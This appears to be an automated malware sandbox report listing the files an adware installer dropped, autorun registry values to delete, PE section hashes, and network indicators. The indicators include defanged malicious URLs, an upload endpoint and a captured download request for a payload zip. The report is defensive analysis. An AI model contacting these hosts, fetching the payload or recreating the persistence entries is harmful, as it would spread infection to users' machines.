%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP102.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP100.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (81233 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP103.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\UAC.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\mastermind\mastermind.exe (47508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\NActions.dll (5869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\sib.dat (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe (166653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe (44026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation\Osman_Navigation.exe (31448 bytes)
%System%\WindowsPowerShell\v1.0\SETE2.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (7 bytes)
%System%\SET3A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (49 bytes)
%System%\winrm\0409\SET52.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (1281 bytes)
%WinDir%\Help\SETE0.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETE8.tmp (16 bytes)
%WinDir%\SECF3.tmp (1897 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (601 bytes)
%System%\SET44.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (438 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (5 bytes)
%System%\GroupPolicy\Adm\SET4F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETD7.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (5 bytes)
%WinDir%\inf\SET34.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (6 bytes)
%System%\wbem\SET1F.tmp (4 bytes)
%System%\SET49.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (2 bytes)
%System%\SET25.tmp (7433 bytes)
%System%\SET20.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETE4.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC1.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETD6.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (5 bytes)
%System%\SET2A.tmp (1281 bytes)
%WinDir%\inf\oem10.PNF (12902 bytes)
%System%\WindowsPowerShell\v1.0\SETE6.tmp (40 bytes)
%System%\SET2D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (18 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDD.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETE7.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (7 bytes)
%System%\SET22.tmp (35 bytes)
%System%\SET3D.tmp (1281 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (20 bytes)
%System%\SET29.tmp (22 bytes)
%System%\SET2B.tmp (2 bytes)
%System%\SET41.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (4185 bytes)
%System%\SET2E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETD4.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (6 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (1 bytes)
%System%\SET45.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (12 bytes)
%System%\SETDA.tmp (42 bytes)
%System%\SET4C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (8 bytes)
%System%\SET4A.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (18248 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (17 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (40 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (9 bytes)
%System%\SET27.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETC2.tmp (3 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\wbem\SET39.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (57 bytes)
%System%\SET42.tmp (601 bytes)
%System%\SET3E.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (1 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SET43.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (8 bytes)
%System%\SET26.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (2 bytes)
%System%\SET21.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (2 bytes)
%WinDir%\msmqinst.log (5468 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE3.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (4 bytes)
%System%\SET3C.tmp (35 bytes)
%System%\SET32.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETE9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (11 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\SET46.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDB.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (601 bytes)
%System%\CatRoot2\dberr.txt (1037 bytes)
%System%\GroupPolicy\Adm\SET37.tmp (2 bytes)
%WinDir%\iis6.log (136883 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (15 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (7 bytes)
%System%\SET48.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC4.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (673 bytes)
%WinDir%\inf\SET4D.tmp (38 bytes)
%System%\SET28.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (15 bytes)
%System%\SET31.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (12 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD8.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (27 bytes)
%System%\SET3F.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETC5.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (2 bytes)
%System%\SET2C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (21 bytes)
%WinDir%\KB968930.log (245685 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\SET3B.tmp (2 bytes)
%System%\SET4B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (601 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (19 bytes)
%System%\SET24.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDE.tmp (673 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (10 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETE5.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (10 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\GroupPolicy\Adm\SET51.tmp (2 bytes)
%System%\SET40.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD5.tmp (7 bytes)
%WinDir%\ocgen.log (71000 bytes)
%WinDir%\inf\SET4E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\SET2F.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (1281 bytes)
%System%\SET47.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (24 bytes)
%System%\winrm\0409\SET38.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET50.tmp (12 bytes)
%System%\SET30.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (22 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (6 bytes)
%System%\SET23.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (13 bytes)
%WinDir%\inf\SET33.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD9.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (9 bytes)
%WinDir%\assembly\tmp\PADGJMQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
%WinDir%\assembly\tmp\4ORUX047\Microsoft.WSMan.Management.dll (9608 bytes)
%WinDir%\assembly\tmp\I147AEHK\Microsoft.WSMan.Runtime.dll (7 bytes)
%WinDir%\assembly\tmp\5NRUX036\System.Management.Automation.resources.dll (9320 bytes)
%WinDir%\assembly\tmp\UEILORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
%WinDir%\assembly\tmp\CWZ258BE\Microsoft.PowerShell.Security.dll (2392 bytes)
%WinDir%\assembly\tmp\6QTWZ258\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
%WinDir%\assembly\tmp\8RUX0369\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
%WinDir%\assembly\tmp\M69DGJMP\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
%WinDir%\assembly\tmp\EX0369CF\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
%WinDir%\assembly\tmp\1KNQUX03\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\VFILORUX\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
%WinDir%\assembly\tmp\BVZ258BF\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\PADGJMPT\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
%WinDir%\assembly\tmp\EVZ258BE\Microsoft.WSMan.Management.resources.dll (13 bytes)
%WinDir%\assembly\tmp\H258BFIL\System.Management.Automation.dll (81046 bytes)
%WinDir%\assembly\tmp\5PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\UEHKNQTW\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
%WinDir%\assembly\tmp\AUX0369D\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
%WinDir%\assembly\tmp\3MQTWZ36\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\H147BEHK\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
%WinDir%\assembly\tmp\UIMQUZ37\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
%WinDir%\assembly\tmp\7RVY147B\Microsoft.PowerShell.Security.resources.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (259 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (26169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (17186 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (7337 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (6081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (3844 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (676 bytes)
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (1 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (2936 bytes)
%WinDir%\Temp\RES14.tmp (2892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (2940 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (2936 bytes)
%WinDir%\setupapi.log (4240 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe (5054 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (44854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (4 bytes)
%Program Files%\FrivLauncher\uninst.exe (8693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (1450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{01193C1E-21DF-4D50-8393-687E2938346B} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (7767 bytes)
%Documents and Settings%\All Users\Desktop\FrivLauncher.lnk (730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (191491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (978 bytes)
%WinDir%\Temp\{CD2F8BB9-5758-4151-B5BB-E507B7C16422} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (711 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\FrivLauncher\FrivLauncher.lnk (742 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (9043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (260891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (237 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe.config (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (18 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@demo1.geniesoftsystem[1].txt (1081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\get_installation_detail[1].htm (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (43 bytes)
%Documents and Settings%\%current user%\Application Data\master\Master.exe (83494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\master\uninstaller.exe (1987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\master\MasterReports.dll (15300 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: Language Neutral
Company Name: Product Name: Product Version: 1.0.0.0Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: Comments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 29324 | 29696 | 4.50526 | 419d4e1be1ac35a5db9c47f553b27cea |
.rdata | 36864 | 11118 | 11264 | 3.11773 | cca1ca3fbf99570f6de9b43ce767f368 |
.data | 49152 | 469916 | 512 | 1.25109 | 77f0839f8ebea31040e462523e1c770e |
.ndata | 520192 | 741376 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 1261568 | 17024 | 17408 | 1.69016 | 0bbd2f1bc316f3c3d0ace6d7a5ce946e |
.reloc | 1282048 | 4054 | 4096 | 1.09312 | ef47c39f20b68b98c681fcd9fd4f6838 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 3
4ae1505b614bcc4f36e88f69b9d2269b
115fe4a617dca139d1dad1a3b3e18d65
723e89e2d665897233e1afdfba6c50d4
Network Activity
URLs
URL | IP |
---|---|
hxxp://genisys.online/browser.jsonp | 104.28.26.189 |
hxxp://178.33.69.66/upload.php | |
hxxp://microsoft.com/ | |
hxxp://e10088.dspb.akamaiedge.net/ | |
hxxp://e10088.dspb.akamaiedge.net/uk-ua/ | |
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | |
hxxp://69.87.192.155/ | |
hxxp://hen2.microaol.net/api | 52.50.127.149 |
hxxp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip | 52.50.127.149 |
hxxp://www.microsoft.com/ | 23.54.1.2 |
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | 23.37.59.27 |
hxxp://www.microsoft.com/uk-ua/ | 23.54.1.2 |
ssl.google-analytics.com | 216.58.214.200 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET hXXp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip HTTP/1.1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2129486
Content-Type: application/zip
Last-Modified: Fri, 18 Mar 2016 10:30:58 GMT
Date: Wed, 11 May 2016 21:18:09 GMT
